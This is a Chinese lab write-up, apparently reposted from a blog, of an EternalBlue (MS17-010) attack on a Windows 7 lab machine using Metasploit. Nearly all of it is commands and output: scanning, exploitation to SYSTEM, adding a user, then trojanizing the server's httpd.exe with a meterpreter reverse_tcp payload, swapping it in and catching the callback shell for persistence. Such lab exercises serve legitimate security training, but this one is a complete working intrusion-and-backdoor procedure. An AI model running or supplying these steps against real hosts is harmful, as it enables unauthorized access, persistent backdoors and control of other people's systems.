實驗名稱：利用永恒之藍滲透win7

實驗人：xx

實驗日期：2021.9.24

實驗目的：通過已知漏洞攻擊目標服務器并拿到shell

實驗環境：

kali：172.16.12.30

win7靶機：172.16.12.4 用戶名：administrator 密碼：vgrant

實驗步驟：

配置靶機防火墻，將相應的“阻塞端口安全策略”————Disabled

查看MS17-010相關模塊，并使用序號3掃描模塊掃描目標及

msf6 > search ms17-010

msf6 > use 3

查看模塊參數并設置目標機IP，執行掃描，未發現相關漏洞

msf6 auxiliary(admin/smb/ms17_010_command) > show options

msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 auxiliary(admin/smb/ms17_010_command) > run

換序號4模塊進行掃描，設置目標主機，執行掃描，發現漏洞

msf6 > search ms17-010

msf6 > use 4

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

查找攻擊模塊，并使用

msf6 > search ms17-010

msf6 > use 0

查看設置模塊，并設置目標主機ip，執行run

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4

rhosts => 172.16.12.4

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

滲透成功

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > pwd C:\Windows\system32

對目標及實施攻擊

截取屏幕

創建賬戶

meterpreter > shell #進入目標機shell

C:\Windows\system32>net user #查看當前賬戶

創建賬戶cuiyi

C:\Windows\system32>net user cuiyi /add

創建后門

meterpreter > ps -S httpd.exe

meterpreter > kill 3212 #先殺死進程才能下載，下載后調到后臺

meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe

制作后門文件

msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp

msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30

lhost => 172.16.12.30

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe

[*] Writing 29184 bytes to /root/httpd_door.exe...

啟動監聽，監聽后門的反向連接，并用run -j到到后臺

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > show options

msf6 exploit(multi/handler) > set lhost 172.16.12.30

lhost => 172.16.12.30

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.12.30:4444

切回之前保存后臺的會話，上傳后門文件并重命名

msf6 exploit(multi/handler) > sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)

msf6 exploit(multi/handler) > sessions 1

[*] Starting interaction with 1...

meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\

meterpreter > pwd

c:\wamp\bin\apache\apache2.2.21\bin

meterpreter > mv httpd.exe httpd.exe.bak

meterpreter > upload /root/httpd_door.exe

[*] uploading : /root/httpd_door.exe -> httpd_door.exe

[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe

[*] uploaded : /root/httpd_door.exe -> httpd_door.exe

meterpreter > mv httpd_door.exe httpd.exe

重啟wampapache服務，服務器啟動后，返回了新的會話（最后一行）

exploit/multi/handler 保持監聽狀態，每當對端的“httpd.exe” 重啟，這邊就會啟動會話

重啟wampapache

返回kaili看到成功建立連接

總結

以上是生活随笔為你收集整理的利用永恒之蓝渗透WIN7的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。